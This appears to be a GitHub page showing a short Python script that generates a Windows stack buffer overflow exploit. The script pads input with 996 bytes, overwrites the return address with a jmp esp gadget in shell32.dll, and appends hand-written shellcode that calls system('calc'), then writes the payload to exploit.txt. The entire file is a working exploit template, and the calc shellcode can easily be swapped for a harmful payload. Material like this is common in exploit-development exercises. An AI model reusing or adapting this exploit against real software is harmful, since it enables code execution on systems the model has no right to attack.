Permalink
Fetching contributors…
Cannot retrieve contributors at this time
19 lines (14 sloc) 641 Bytes
import struct
p32 = lambda x: struct.pack('<I', x)
jesp = 0x7d711020 # shell32.dll
shellcode = "\x31\xC9" # xor ecx, ecx
shellcode += "\x51" # push ecx
shellcode += "\x68\x63\x61\x6C\x63" # push 0x63616c63 (push calc)
shellcode += "\x54" # push dword ptr esp
shellcode += "\xBA\xC7\x93\xbf\x77" # mov edx, 0x77bf93c7 (mov edx, system)
shellcode += "\xFF\xD2"; # call edx
shellcode += "\x90" * 2 # suffix
payload = 'A' * 996 + p32(jesp) + "aaaabbbbcccc" + shellcode
# print(payload)
with open("exploit.txt", "wb") as f:
f.write(payload)